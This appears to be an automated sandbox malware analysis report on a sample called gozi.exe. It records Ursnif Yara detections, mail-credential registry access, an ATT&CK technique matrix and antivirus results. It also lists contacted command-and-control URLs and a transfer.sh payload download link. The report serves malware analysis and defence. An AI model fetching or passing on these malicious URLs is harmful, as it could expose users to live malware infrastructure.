Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gozi.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 cpuid

8_2_010A42A6

Source: C:\Users\user\Desktop\gozi.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_00401C44 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,

8_2_00401C44

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_010A42A6 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

8_2_010A42A6

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_03F1C557 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

8_2_03F1C557

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 8_2_004017A0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

8_2_004017A0

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000001C.00000003.532875532.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392490032.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.826395409.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672226246.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671882459.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392591901.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473440748.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671987567.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392517903.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541235990.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672047552.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392607938.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.671936053.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473486452.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.540930276.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.457301811.00000000043A8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392570642.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672143247.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473394409.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000003.541170125.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000003.473504593.000001DC0EF2C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.825382176.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.405030349.000000000320C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.392542209.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.395416668.0000000003408000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000003.672170468.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000002F.00000002.673705435.0000000003508000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.543904492.0000020FDF04C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 5696, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: control.exe PID: 5676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 4364, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.330a4a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33b8f40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.RegAsm.exe.33894a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000024.00000000.539555209.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.652250920.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.568184534.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.609566601.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.468518313.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.523377381.000000000308F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.563482706.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.615563963.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.655957739.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000000.648045274.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.470699283.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.537792307.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000000.572793373.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.398744797.0000000003389000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.472358807.0000000000E50000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000000.535827896.0000020FDEA80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000002.824135960.00000163C5171000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002D.00000002.819337222.000001EAE4571000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000029.00000000.621795530.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.542236121.0000000000E51000.00000020.00020000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data12	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact1
Default Accounts	Native API2	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection11	Exfiltration Over Bluetooth	Encrypted Channel21	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Logon Script (Windows)	Access Token Manipulation1	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection813	Software Packing13	NTDS	System Information Discovery46	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol14	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Security Software Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Virtualization/Sandbox Evasion21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Rootkit4	DCSync	Process Discovery3	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Masquerading1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Valid Accounts1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	Remote System Discovery11	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Virtualization/Sandbox Evasion21	Input Capture	System Network Configuration Discovery3	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	Process Injection813	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery
Compromise Hardware Supply Chain	Visual Basic	Scheduled Task	Scheduled Task	Rundll321	GUI Input Capture	Domain Groups	Exploitation of Remote Services	Email Collection	Commonly Used Port	Proxy			Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
gozi.exe	38%	Virustotal		Browse
gozi.exe	40%	Metadefender		Browse
gozi.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
gozi.exe	100%	Avira	TR/Kryptik.jcfst
gozi.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.0.RegAsm.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.gozi.exe.32857b4.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
8.2.RegAsm.exe.10a0000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
8.0.RegAsm.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.5.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.3.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.7.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
2.2.gozi.exe.329b084.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
8.2.RegAsm.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.RegAsm.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://apr.intooltak.com/lnhNHa_2Btty8CaNj/2ZI6TN22qvUD/8ZPV4upYsm_/2FN7_2B_2BUcD0/ieoqnU4qUIxSEwBSH	100%	Avira URL Cloud	malware
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://ns.adobp/	0%	Avira URL Cloud	safe
http://constitution.org/usdeclar.txtC:	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
http://io.immontyr.com/cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://ns.adobe.cmgR	0%	Avira URL Cloud	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://constitution.org/usdeclar.txt	0%	URL Reputation	safe
http://ns.adobe.ux2	0%	Avira URL Cloud	safe
https://transfer.sh4jl	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://ns.micro/1	0%	Avira URL Cloud	safe
http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
myip.opendns.com	102.129.143.64	true	false	high
resolver1.opendns.com	208.67.222.222	true	false	high
transfer.sh	144.76.136.153	true	false	high
io.immontyr.com	185.189.12.123	true	false	high
apr.intooltak.com	185.189.12.123	true	false	high
222.222.67.208.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://io.immontyr.com/cG9R2yLu/hwY1VC7UV0FGuTFHUDuWv94/dWPB0qINsS/UcOtH5ibuFGkRtRRz/TcTs3WrbL3kk/KH9_2B01P5_/2BqOCU5VAuO8RX/tDtOsh5JefONIGFgJjwJW/WTNQ_2BigLNUfSTv/vEQOtss42jXAD7m/Vb_2FBrZFcmnzVx4eL/FgvV_2F2J/WJxkKD87XHV59J1BIptx/grHAayUrM6ZXOpWMd4b/m8CaZcQ61hUgT0Er2sN6yR/jqxJkoogaoGBQ/oxZTsR50/IU6qlhp0LlHnTmpxFkzazjn/ZXLdcjlESY/R9eDED1XHAy_2FpXA/QYirrLarjNjS/_2Faftuam8rF_2F/1Ew	true	Avira URL Cloud: safe	unknown
https://transfer.sh/get/3dvhcv/lia.exe	false		high
http://apr.intooltak.com/vlSm5FdhwFmMvT/YOr1y3vmv8eg4Ac3b7Y_2/BxNzh6No2PWjhu_2/Fyyb9C79h8hjmv0/0MJdM07T0vYSwv1YW8/_2F13x6Wl/Lrng4lSkMN3h4WUh3_2B/V0ttocBRKlq9AtXNAro/11M6x_2BaL1Zjx_2BWp4qX/FgWuexW_2FQbO/w_2FMf21/MXsR7_2BkMZgcjp0nVIxUlY/KUQNsPRxFs/f5vu_2BQoVI2fu6H_/2BIGCwdRzvbj/hz_2BIOSiZR/JFogKN88OOAHtb/M_2BNELxC21s15Johd0jZ/ulyOnBSm1PSraDUT/nl6kvDdqLoljmN_/2B2yicis3/ZYLr	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
